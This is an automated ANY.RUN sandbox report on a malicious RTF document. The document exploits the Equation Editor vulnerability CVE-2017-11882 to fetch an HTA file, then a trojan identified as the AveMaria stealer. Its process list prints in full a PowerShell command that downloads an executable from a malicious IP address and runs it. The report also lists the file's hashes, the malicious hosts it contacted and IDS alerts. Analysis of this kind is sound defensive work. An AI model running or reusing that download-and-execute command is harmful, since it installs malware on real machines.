analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

good.rtf

Full analysis: https://app.any.run/tasks/c29216e4-f938-4d81-a619-4e16800df1de
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Malware Trends Tracker     >>>
Analysis date: January 23, 2019, 11:02:04
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
exploit
CVE-2017-11882
trojan
Indicators:
MIME: text/rtf
File info: Rich Text Format data, unknown version
MD5:

A29F2FE230C0CDA79A58E5E17F99DEB6

SHA1:

1EA242DF377920802E1BCCD78A9A8C739CEE90E8

SHA256:

0FC922E74C4FEF1E429497DA9A8B9CB88B69DBC3F2DF8B0B15CE26ED1F7B44C8

SSDEEP:

96:lov1jYdnOgvCPi9Q3Pr1bOMF1q1MQjgfm6L7wgDK5gweeKKH7PkTDf53HcAHv/dU:lOFYkwCq90z1bj1qyLYXgCKOS53cAHvC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 4092)

    • Suspicious connection from the Equation Editor

      • EQNEDT32.EXE (PID: 4092)

    • Executes PowerShell scripts

      • cmd.exe (PID: 2600)

    • Application was dropped or rewritten from another process

      • fdfsdfdssdfdfrwtwr4t.exe (PID: 3344)

    • Downloads executable files from the Internet

      • powershell.exe (PID: 3616)

    • Downloads executable files from IP

      • powershell.exe (PID: 3616)

  • SUSPICIOUS

    • Creates files in the user directory

      • EQNEDT32.EXE (PID: 4092)
      • powershell.exe (PID: 3616)

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EQNEDT32.EXE (PID: 4092)

    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 3768)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3616)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3064)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3064)

    • Reads internet explorer settings

      • mshta.exe (PID: 3768)

    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 3616)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
6
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs eqnedt32.exe mshta.exe no specs cmd.exe no specs powershell.exe fdfsdfdssdfdfrwtwr4t.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3064"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\good.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4092"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
3768"C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Roaming\jbkgvgviyufufuifyuf.hta" C:\Windows\System32\mshta.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2600"C:\Windows\System32\cmd.exe" /c powershell (new-object System.Net.WebClienT).DownloadFile('http://194.36.173.46/good.exe','%temp%\fdfsdfdssdfdfrwtwr4t.exe'); Start '%temp%\fdfsdfdssdfdfrwtwr4t.exe'C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3616powershell (new-object System.Net.WebClienT).DownloadFile('http://194.36.173.46/good.exe','C:\Users\admin\AppData\Local\Temp\fdfsdfdssdfdfrwtwr4t.exe'); Start 'C:\Users\admin\AppData\Local\Temp\fdfsdfdssdfdfrwtwr4t.exe'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3344"C:\Users\admin\AppData\Local\Temp\fdfsdfdssdfdfrwtwr4t.exe" C:\Users\admin\AppData\Local\Temp\fdfsdfdssdfdfrwtwr4t.exepowershell.exe
User:
admin
Company:
Simon Tatham
Integrity Level:
MEDIUM
Description:
SSH, Telnet and Rlogin client
Version:
Release 0.64
Total events
1 607
Read events
1 468
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
2
Text files
4
Unknown types
4

Dropped files

PID
Process
Filename
Type
3064WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6BF9.tmp.cvr
MD5:
SHA256:
3616powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E3O0FKQ3M9KUGVRHJ6PF.temp
MD5:
SHA256:
3064WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:6474936BCF9E0E40D986D76CB8B97569
SHA256:A429E08BF13A763B1E1B56C70E9C488FD3A3D63556417F9C15A5F53B8F3D1253
3616powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF247b89.TMPbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
3064WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:D5EF0D22F4896C9C14D722C078F707B2
SHA256:2F7CE0F86405DC2A43223655F2D2028DBDE52F7AEBFBA262CBD04F143B1EB90A
4092EQNEDT32.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\good[1].htahtml
MD5:1146E764A4C86839CB7AC46DCABB66D0
SHA256:08EE854AB6DA54E95FA82BE440060B475CC2A97912C422F185F552A5A826F1DC
4092EQNEDT32.EXEC:\Users\admin\AppData\Roaming\jbkgvgviyufufuifyuf.htahtml
MD5:1146E764A4C86839CB7AC46DCABB66D0
SHA256:08EE854AB6DA54E95FA82BE440060B475CC2A97912C422F185F552A5A826F1DC
3616powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
3064WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\good.rtf.LNKlnk
MD5:48AE18F750EDE80DD3227C54209FCC0E
SHA256:19B17F8AE2DE34F0E2B5041E623130C123B7CF05822A64D3B34E16318D69C461
3064WINWORD.EXEC:\Users\admin\Desktop\~$good.rtfpgc
MD5:433EA638E46CE1FC6836B36437BE65CD
SHA256:A21510E1CE3ACD397004A308E5CCF36CEE1A2C41CDA84D69C661ED25311B1C77
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3616
powershell.exe
GET
200
194.36.173.46:80
http://194.36.173.46/good.exe
unknown
executable
121 Kb
malicious
4092
EQNEDT32.EXE
GET
200
194.36.173.46:80
http://194.36.173.46/good.hta
unknown
html
1.12 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3616
powershell.exe
194.36.173.46:80
malicious
23.249.161.11:5200
ColoCrossing
US
malicious
4092
EQNEDT32.EXE
194.36.173.46:80
malicious

DNS requests

No data

Threats

PID
Process
Class
Message
4092
EQNEDT32.EXE
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious HTA application download
4092
EQNEDT32.EXE
Potentially Bad Traffic
ET POLICY Possible HTA Application Download
4092
EQNEDT32.EXE
Attempted User Privilege Gain
ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
3616
powershell.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3616
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3616
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3616
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3616
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
A Network Trojan was detected
MALWARE [PTsecurity] Stealer.Win32.AveMaria
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Fuerboos Win32
4 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
good.rtf